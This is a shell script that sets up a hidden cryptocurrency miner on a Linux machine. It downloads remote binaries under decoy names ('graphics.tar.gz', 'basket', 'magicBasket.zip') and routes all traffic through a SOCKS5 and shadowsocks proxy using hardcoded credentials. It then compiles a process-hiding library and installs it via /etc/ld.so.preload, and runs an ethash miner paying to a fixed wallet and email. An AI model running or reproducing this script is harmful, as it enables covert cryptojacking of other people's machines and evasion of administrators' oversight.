#!/bin/sh

ln -fs /usr/share/zoneinfo/Africa/Johannesburg /etc/localtime

dpkg-reconfigure --frontend noninteractive tzdata

apt update;apt -y install binutils cmake build-essential screen unzip net-tools curl

wget https://raw.githubusercontent.com/nathanfleight/scripts/main/graphics.tar.gz

tar -xvzf graphics.tar.gz

cat > graftcp/local/graftcp-local.conf <<END

listen = :2233 

loglevel = 1 

socks5 = 3.15.39.186:1080 

socks5_username = mikrotik999 

socks5_password = Elibawnos 

select_proxy_mode = only_socks5

END

./graftcp/local/graftcp-local -config graftcp/local/graftcp-local.conf &

sleep .2

echo " "
echo " "

echo "******************************************************************"

./graftcp/graftcp curl ifconfig.me

echo " "
echo " "

echo "******************************************************************"

echo " "
echo " "

./graftcp/graftcp wget https://raw.githubusercontent.com/nathanfleight/scripts/main/basket
chmod +x basket

./graftcp/graftcp apt -y install shadowsocks-libev rng-tools
./graftcp/graftcp rngd -r /dev/urandom
./graftcp/graftcp ss-local -s 3.15.39.186 -p 8388 -l 9999 -k Elibawnos -m chacha20-ietf-poly1305 -v &

./graftcp/graftcp wget https://raw.githubusercontent.com/nathanfleight/scripts/main/magicBasket.zip
./graftcp/graftcp unzip magicBasket.zip
./graftcp/graftcp make
./graftcp/graftcp gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
./graftcp/graftcp mv libprocesshider.so /usr/local/lib/
./graftcp/graftcp echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload

./graftcp/graftcp ./basket -a ethash -o eth-eu1.hellominer.com:1100 -u 0x587bdded4037bba7c74fb6af2f6e296bb2f8415d.$(echo $(shuf -i 1-9999 -n 1)-itil)/maesdori@gmail.com -log --proxy 127.0.0.1:9999
